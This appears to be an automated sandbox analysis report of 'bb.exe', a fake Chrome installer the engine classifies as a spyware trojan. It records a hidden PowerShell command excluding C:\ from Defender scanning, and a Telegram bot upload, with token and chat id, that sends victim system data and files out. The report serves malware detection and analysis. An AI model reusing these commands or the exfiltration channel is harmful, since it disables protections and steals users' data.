            Source: bb.exe, 00000000.00000003.229055225.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.227122133.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.227110877.00000000058B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers&
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: bb.exe, 00000000.00000003.227249238.00000000058B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers=
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: bb.exe, 00000000.00000003.229042431.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.229055225.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: bb.exe, 00000000.00000003.227505209.00000000058B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersR
            Source: bb.exe, 00000000.00000003.227536327.00000000058B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersb
            Source: bb.exe, 00000000.00000003.227151222.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.227170553.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.227162048.00000000058B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designerst
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: bb.exe, 00000000.00000003.225021045.000000000589C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: bb.exe, 00000000.00000003.225093469.000000000589D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/=
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: bb.exe, 00000000.00000003.224894504.0000000005899000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225021045.000000000589C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn4
            Source: bb.exe, 00000000.00000003.224894504.0000000005899000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225021045.000000000589C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnB
            Source: bb.exe, 00000000.00000003.224894504.0000000005899000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225021045.000000000589C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnbiol
            Source: bb.exe, 00000000.00000003.225278682.000000000589D000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225258364.000000000589D000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225093469.000000000589D000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225182094.000000000589D000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225228360.000000000589D000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225021045.000000000589C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnt
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: bb.exe, 00000000.00000003.225290062.0000000005893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comq
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: powershell.exe, 00000008.00000002.270361357.0000000006008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000008.00000002.270361357.0000000006008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000008.00000002.270361357.0000000006008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000008.00000002.270361357.0000000006008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: unknownDNS traffic detected: queries for: ipwho.is
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1accept: */*host: ipwho.is
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: bb.exe, 00000000.00000000.208820822.0000000000EFC000.00000002.00000001.01000000.00000003.sdmp, bb.exe, 00000000.00000002.327791244.0000000000EFC000.00000002.00000001.01000000.00000003.sdmp, bb.exe, 00000004.00000000.251101197.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: FlashWindowExFlashWindowGetPackagePathhttp://www.google.comTESTtin9999.tmphttp://www.yahoo.comhttp://www.example.com.part= "GETattachmentDLD123filenamecharsetutf-16ISO-8859-1POSTutf-8Local Network ServerFTP ServerUS-ASCIIAdvancedInstallerRange: bytes=%u- equals www.yahoo.com (Yahoo)
            Source: unknownHTTP traffic detected: POST /bot6309284469:AAFeRYflNDLxPEOCUiJVtoraS_FZTAABfwg/sendDocument?chat_id=-1001826179816&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20191.101.61.19%0ACountry:%20United%20States%0ACity:%20Las%20Vegas%0APostal:%2089101%0AISP:%20Cogent%20Communications%20-%20A174%0ATimezone:%20-07:00%0A%0A-%20PC%20Info%20-%0A%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20VLSU3BRF%20(1280,%201024)%0AHWID:%204573883483855036%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Program%20Files\Google%20LLC\Google%20Chrome\setup.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9D%8C%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2018%0ACredit%20Cards:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=85897f56aee1e107-288ab59860bd3f6b-d74d75859e458c4f-4476a0ac9fbfa3e1content-length: 819905accept: */*host: api.telegram.org
            Source: unknownHTTPS traffic detected: 108.181.47.111:443 -> 192.168.2.7:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49732 version: TLS 1.2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\aicD7.pfxJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00C930004_2_00C93000
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00CCB9104_2_00CCB910
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00C976204_2_00C97620
            Source: C:\Users\user\Desktop\bb.exeSection loaded: lpk.dllJump to behavior
            Source: C:\Users\user\Desktop\bb.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\Desktop\bb.exeSection loaded: lpk.dllJump to behavior
            Source: C:\Users\user\Desktop\bb.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: bb.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIFAEC.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\48f6f4.msiJump to behavior
            Source: C:\Users\user\Desktop\bb.exeCode function: String function: 00C98300 appears 31 times
            Source: C:\Users\user\Desktop\bb.exeCode function: String function: 00C98DB0 appears 106 times
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00CA6CD0 NtdllDefWindowProc_W,4_2_00CA6CD0
            Source: bb.exe, 00000000.00000000.208854578.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameGoogle Chrome.exe< vs bb.exe
            Source: bb.exe, 00000000.00000003.216871030.00000000050E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs bb.exe
            Source: bb.exe, 00000004.00000000.251137762.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameGoogle Chrome.exe< vs bb.exe
            Source: bb.exe, 00000004.00000003.254129717.00000000034B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNameGoogle Chrome.aiui< vs bb.exe
            Source: bb.exe, 00000004.00000003.253691994.00000000034B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs bb.exe
            Source: bb.exeStatic PE information: invalid certificate
            Source: bb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: setup.lnk.1.drLNK file: ..\..\..\..\..\..\Program Files\Google LLC\Google Chrome\setup.exe
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Roaming\Google LLCJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/97@2/2
            Source: C:\Users\user\Desktop\bb.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00C9A160 LoadResource,LockResource,SizeofResource,4_2_00C9A160
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Google LLCJump to behavior
            Source: bb.exeReversingLabs: Detection: 13%
            Source: C:\Users\user\Desktop\bb.exeFile read: C:\Users\user\Desktop\bb.exeJump to behavior
            Source: C:\Users\user\Desktop\bb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\bb.exe C:\Users\user\Desktop\bb.exe
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 39B2946DA8EA32E5CF40005A5AF4C9C3 C
            Source: C:\Users\user\Desktop\bb.exeProcess created: C:\Users\user\Desktop\bb.exe C:\Users\user\Desktop\bb.exe" /i "C:\Users\user\AppData\Roaming\Google LLC\Google Chrome 116.0.596.10\install\Google Chrome.msi" AI_EUIMSI=1 APPDIR="C:\Program Files\Google LLC\Google Chrome" SHORTCUTDIR="C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome" SECONDSEQUENCE="1" CLIENTPROCESSID="6524" CHAINERUIPROCESSID="6524Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_SETUPEXEPATH="C:\Users\user\Desktop\bb.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1694097598 " AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\bb.exe" TARGETDIR="C:\" AI_INSTALL="1
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 168A822027102CE8D563A5F7F2223835
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\pssD8.ps1" -manufacturer "Google LLC" -pass "aicD7.pfx" -pfxPath "C:\Users\user~1\AppData\Local\Temp\aicD7.pfx"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files\Google LLC\Google Chrome\setup.exe C:\Program Files\Google LLC\Google Chrome\setup.exe
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -Command "Set-MpPreference -ExclusionPath" C:\
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\bb.exeProcess created: C:\Users\user\Desktop\bb.exe C:\Users\user\Desktop\bb.exe" /i "C:\Users\user\AppData\Roaming\Google LLC\Google Chrome 116.0.596.10\install\Google Chrome.msi" AI_EUIMSI=1 APPDIR="C:\Program Files\Google LLC\Google Chrome" SHORTCUTDIR="C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome" SECONDSEQUENCE="1" CLIENTPROCESSID="6524" CHAINERUIPROCESSID="6524Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_SETUPEXEPATH="C:\Users\user\Desktop\bb.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1694097598 " AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\bb.exe" TARGETDIR="C:\" AI_INSTALL="1Jump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 39B2946DA8EA32E5CF40005A5AF4C9C3 CJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 168A822027102CE8D563A5F7F2223835Jump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files\Google LLC\Google Chrome\setup.exe C:\Program Files\Google LLC\Google Chrome\setup.exeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\pssD8.ps1" -manufacturer "Google LLC" -pass "aicD7.pfx" -pfxPath "C:\Users\user~1\AppData\Local\Temp\aicD7.pfx"Jump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -Command "Set-MpPreference -ExclusionPath" C:\
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName
            Source: C:\Users\user\Desktop\bb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user~1\AppData\Local\Temp\shi269F.tmpJump to behavior
            Source: setup.exe, 0000000C.00000003.291676969.00000260C129F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000000C.00000003.291676969.00000260C12A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_01
            Source: C:\Users\user\Desktop\bb.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: bb.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Google LLCJump to behavior
            Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Google LLC\Google ChromeJump to behavior
            Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Google LLC\Google Chrome\setup.exeJump to behavior
            Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome 116.0.596.10Jump to behavior
            Source: bb.exeStatic file information: File size 11824016 > 1048576
            Source: bb.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x26ae00
            Source: bb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: bb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: bb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: bb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: bb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: bb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: bb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: bb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: wininet.pdb source: bb.exe, 00000000.00000003.216871030.00000000050E2000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253691994.00000000034B2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wininet.pdbUGP source: bb.exe, 00000000.00000003.216871030.00000000050E2000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253691994.00000000034B2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: bb.exe, 00000000.00000000.208820822.0000000000EFC000.00000002.00000001.01000000.00000003.sdmp, bb.exe, 00000000.00000002.327791244.0000000000EFC000.00000002.00000001.01000000.00000003.sdmp, bb.exe, 00000004.00000000.251101197.0000000000EFC000.00000002.00000001.01000000.00000003.sdmp, bb.exe, 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmp
            Source: bb.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: bb.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: bb.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: bb.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: bb.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Suspicious powershell command line found
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -Command "Set-MpPreference -ExclusionPath" C:\
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -Command "Set-MpPreference -ExclusionPath" C:\
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_3_01204F26 push esi; retf 4_3_01204F23
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_3_011FE888 push cs; retf 4_3_011FE88A
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_3_011FC8AA push esp; retf 4_3_011FC8AB
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_3_011FE3EC push cs; retf 4_3_011FE3EE
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00E7086C push ecx; ret 4_2_00E7087F
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00C9F926 LoadLibraryW,GetProcAddress,FreeLibrary,4_2_00C9F926
            Source: shi269F.tmp.0.drStatic PE information: 0x72F9C735 [Sun Feb 16 01:34:45 2031 UTC]
            Source: shi269F.tmp.0.drStatic PE information: section name: .wpp_sf
            Source: shi269F.tmp.0.drStatic PE information: section name: .didat
            Source: setup.exe.1.drStatic PE information: section name: _RDATA
            Source: shiF4D1.tmp.4.drStatic PE information: section name: .wpp_sf
            Source: shiF4D1.tmp.4.drStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\ProgramData\Caphyon\Advanced Installer\{C0E9F3B5-1040-4A45-ACBB-0C1165F58D53}\Google Chrome.exeJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Roaming\Google LLC\Google Chrome 116.0.596.10\install\Google Chrome.aiuiJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\ExternalUICleaner.dllJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Local\Temp\MSI300E.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Google LLC\Google Chrome\setup.exeJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Local\Temp\MSI277B.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Local\Temp\MSI2F10.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFEB8.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Local\Temp\MSI2E04.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFC17.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFAEC.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\ProgramData\Caphyon\Advanced Installer\{C0E9F3B5-1040-4A45-ACBB-0C1165F58D53}\Google Chrome.exeJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Local\Temp\MSI2F50.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Local\Temp\shi269F.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Local\Temp\MSI2EB2.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Local\Temp\MSI2FCF.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFCA4.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Local\Temp\shiF4D1.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Local\Temp\MSI430C.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Local\Temp\MSI438A.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Local\Temp\MSI305E.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Local\Temp\MSI2E63.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFBD7.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Roaming\Google LLC\Google Chrome 116.0.596.10\install\Google Chrome.aiuiJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Local\Temp\MSI2F9F.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Local\Temp\MSI43F8.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\lzmaextractor.dllJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFCA4.tmpJump to dropped file
